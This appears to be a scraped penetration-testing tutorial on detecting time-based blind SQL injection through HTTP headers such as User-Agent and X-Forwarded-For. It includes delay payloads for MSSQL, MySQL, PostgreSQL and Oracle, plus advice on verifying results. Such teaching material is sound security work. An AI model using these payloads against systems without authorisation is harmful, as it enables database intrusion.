Identifying Time-based
Scenario
Target: Digcraft Hosting - Main website Challenge: No visible input fields on the page
Reconnaissance
Page Analysis
Website shows pricing plans - no forms or input fields visible.
Don't forget to test HTTP headers!
Headers to Test
1st
Custom headers
Surely used by server
2nd
Host
Common injection point
3rd
User-Agent
Often logged/processed
4th
X-Forwarded-For
Proxy/logging usage
5th
Referer
Analytics tracking
6th
Cookie
Session handling
Time-based Injection Payload
MSSQL Payload
How It Works
'
Close existing string
;
End current statement
WAITFOR DELAY
Block query execution
'0:0:10'
Wait 10 seconds (H:M:S)
--
Comment out rest
Testing Headers
Inject in User-Agent
Result
';WAITFOR DELAY '0:0:10'--
10,013 ms β οΈ
Normal User-Agent
9 ms
10 second delay = SQLi confirmed!
Verification
Always verify by testing:
With delay β Response takes ~10 seconds
Without delay β Response is immediate
This confirms the delay is caused by your payload, not server issues.
Time-based Payloads by Database
MSSQL
WAITFOR DELAY '0:0:10'
MySQL/MariaDB
AND (SELECT SLEEP(10) FROM dual WHERE database() LIKE '%')
PostgreSQL
|| (SELECT 1 FROM PG_SLEEP(10))
Oracle
AND 1234=DBMS_PIPE.RECEIVE_MESSAGE('RaNdStR',10)
Complete Payload Examples
MSSQL
MySQL
PostgreSQL
Oracle
Detection Tips
Choosing Delay Time
5 seconds
Quick testing
10 seconds
Clear distinction
2-3 seconds
High-latency networks
False Positives
Watch out for:
Slow server response
Network latency
Rate limiting delays
Always compare injected vs non-injected response times.
Common Injection Points
HTTP Headers
Less Obvious Locations
Quick Reference
MSSQL Delay Syntax
Time Format Examples
'0:0:5'
5 seconds
'0:0:10'
10 seconds
'0:1:0'
1 minute
'0:0:0.5'
500 ms
Next Steps
Last updated